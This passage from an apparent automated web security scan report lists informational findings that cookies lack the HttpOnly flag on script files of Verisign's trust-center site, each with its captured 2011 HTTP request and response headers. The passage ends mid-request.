Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/oo_engine_c.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/oo_engine_c.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 28368
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var OnlineOpinion=new Ob...[SNIP]...
10.98. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/popup.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/popup.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 598
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var currentPopupId=null;function hidePopup(){if(currentPopupId){hideElement(currentPopupId);currentPopupId=null;showElementBlock("right_content");showElementBlock("right_content_1");showElementBlock(...[SNIP]...
10.99. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/product_white_list.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/product_white_list.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1005
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var product_white_list=["SS001","SS002","SS0Y3","SS003","GS001","GS002","GS0Y3","HA001","HA002","HA0Y3","GHA001","GHA002","GHA0Y3","ABSST000"];function white_list_product(product){for(var i=0;i<produ...[SNIP]...
10.100. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/quick_signin.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/quick_signin.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 5155
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var http_request=false;var targetAjaxDiv="unspecified";function callbackFunction(){if(http_request.readyState==4){if(http_request.status==200){var result=http_request.responseText;try{document.getEle...[SNIP]...
10.101. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/script_log.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/script_log.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1408
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var log;function getLogLevel(){if(document.getElementById("script_log")===null){return"none";}else{return document.getElementById("script_log").value;}} function generateCall(level,message){var url='...[SNIP]...
10.102. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/src/dojo/dojo/dojo.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/src/dojo/dojo/dojo.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:25 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 89269
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* Copyright (c) 2004-2009, The Dojo Foundation All Rights Reserved. Available via Academic Free License >= 2.1 OR the modified BSD license. see: http://dojotoolkit.org/license for details */ /* ...[SNIP]...
10.103. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/syscheck.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/syscheck.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1470
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var oVal;var sessionTimerId=0;var SESSIONTIMEOUT=33*60*1000;function checkStatus(val){if(oVal!=val){window.location.reload();}} function callServer(check,orig){var localHttpObj=getXMLHttpObj();oVal=o...[SNIP]...
10.104. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/tealeaf/TealeafSDK.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/tealeaf/TealeafSDK.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 57905
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

if(TeaLeaf&&TeaLeaf.Configuration&&TeaLeaf.Configuration.tlinit==false){TeaLeaf.Configuration.tlinit=true;if(!Array.prototype.push){Array.prototype.stackEnd=0;Array.prototype.push=function(a){this[thi...[SNIP]...
10.105. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 22968
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* * Copyright . 1999-2009 TeaLeaf Technology, Inc. * All rights reserved. * * THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS'' ...[SNIP]...
10.106. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/trustcenter_capture_payment.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/trustcenter_capture_payment.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4605
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

function onPaymentMethodChange(){var paymentMethodObj=getElement("enrollment.payment.paymentMethod");if(paymentMethodObj!==null){var radioLength=paymentMethodObj.length;var index=0;for(var i=0;i<radi...[SNIP]...
10.107. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/trustcenter_product_selector.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/trustcenter_product_selector.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 19769
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var premiumSupportFee=0;var pciComplianceFee=0;var pricingMatrix=[];var validityObjFive=null;var validityObjFour=null;var validityObjThree=null;var validityObjTwo=null;var validityObjOne=null;var pro...[SNIP]...
10.108. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/utility.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/utility.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; 